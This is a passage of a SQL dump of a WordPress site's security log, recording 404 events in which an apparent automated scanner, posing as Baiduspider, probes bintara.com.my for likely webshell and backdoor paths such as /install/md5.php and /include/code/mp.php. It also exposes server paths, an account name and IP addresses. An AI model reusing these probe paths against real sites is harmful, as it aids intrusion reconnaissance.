1OEzngAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544731.1799\";s:12:\"REQUEST_TIME\";s:10:\"1570544731\";}}','notice','2019-10-08 14:25:33','2019-10-08 14:25:32',35058680,36865352,'https://bintara.com.my/lang/cn/system.php',1,0,'93.55.151.59'),(27705,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/include/code/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"156.213.194.98\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=f655ba565d8f0c842a3de30de236c318\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"156.213.194.98\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycRcC1sJTsX3mg7G4JKgAAAAI\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycRcC1sJTsX3mg7G4JKgAAAAI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycRcC1sJTsX3mg7G4JKgAAAAI\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycRcC1sJTsX3mg7G4JKgAAAAI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"65320\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:10:\"SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycRcC1sJTsX3mg7G4JKgAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544709.7299\";s:12:\"REQUEST_TIME\";s:10:\"1570544709\";}}','notice','2019-10-08 14:25:12','2019-10-08 14:25:10',35058680,36867600,'https://bintara.com.my/include/code/mp.php',1,0,'156.213.194.98'),(27704,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=6022\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"4.169.125.82\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ca0d3c59ebbd94b19325f184c728aa1a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"4.169.125.82\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycObDTiPzaBc@31OEzkwAAAQ4\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycObDTiPzaBc@31OEzkwAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycObDTiPzaBc@31OEzkwAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62319\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycObDTiPzaBc@31OEzkwAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544698.0542\";s:12:\"REQUEST_TIME\";s:10:\"1570544698\";}}','notice','2019-10-08 14:25:01','2019-10-08 14:24:58',35445344,37257296,'https://bintara.com.my/plus/mytag_js.php?aid=6022',1,0,'4.169.125.82'),(27703,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/install/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"75.149.128.90\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=652209535a9254ce3eaea8303c809b4f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"75.149.128.90\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycMbDTiPzaBc@31OEziwAAARg\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycMbDTiPzaBc@31OEziwAAARg\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycMbDTiPzaBc@31OEziwAAARg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62319\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:10:\"SCRIPT_URL\";s:16:\"/install/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycMbDTiPzaBc@31OEziwAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544689.3318\";s:12:\"REQUEST_TIME\";s:10:\"1570544689\";}}','notice','2019-10-08 14:24:51','2019-10-08 14:24:49',35053920,36862752,'https://bintara.com.my/install/md5.php',1,0,'75.149.128.90'),(27702,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/install/m7lrv.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"186.79.70.61\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=9a26ba7b2d200a6c7c1950e21344a793\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"186.79.70.61\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycJrDTiPzaBc@31OEzhwAAARE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycJrDTiPzaBc@31OEzhwAAARE\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycJrDTiPzaBc@31OEzhwAAARE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"59698\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:10:\"SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycJrDTiPzaBc@31OEzhwAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544678.6363\";s:12:\"REQUEST_TIME\";s:10:\"1570544678\";}}','notice','2019-10-08 14:24:40','2019-10-08 14:24:39',35055800,36861976,'https://bintara.com.my/install/m7lrv.php',1,0,'186.79.70.61'),(27701,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/include/helperss/filter.helpear.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"13.65.76.209\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4f6be2d93c24445bfd56aeabf3c98e72\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"13.65.76.209\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycH7DTiPzaBc@31OEzgAAAAQo\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycH7DTiPzaBc@31OEzgAAAAQo\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycH7DTiPzaBc@31OEzgAAAAQo\";s:19:\"REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycH7DTiPzaBc@31OEzgAAAAQo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"59698\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:10:\"SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycH7DTiPzaBc@31OEzgAAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544671.2305\";s:12:\"REQUEST_TIME\";s:10:\"1570544671\";}}','notice','2019-10-08 14:24:33','2019-10-08 14:24:31',35063216,36865032,'https://bintara.com.my/include/helperss/filter.helpear.php',1,0,'13.65.76.209'),(27700,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:70:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"/include/data/fonts/uddatasql.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"177.212.112.222\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c4125dea94f7282ed1e0d57adc6c0791\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"177.212.112.222\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycDHURUVLSjYCXpcIy6gAAAME\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UN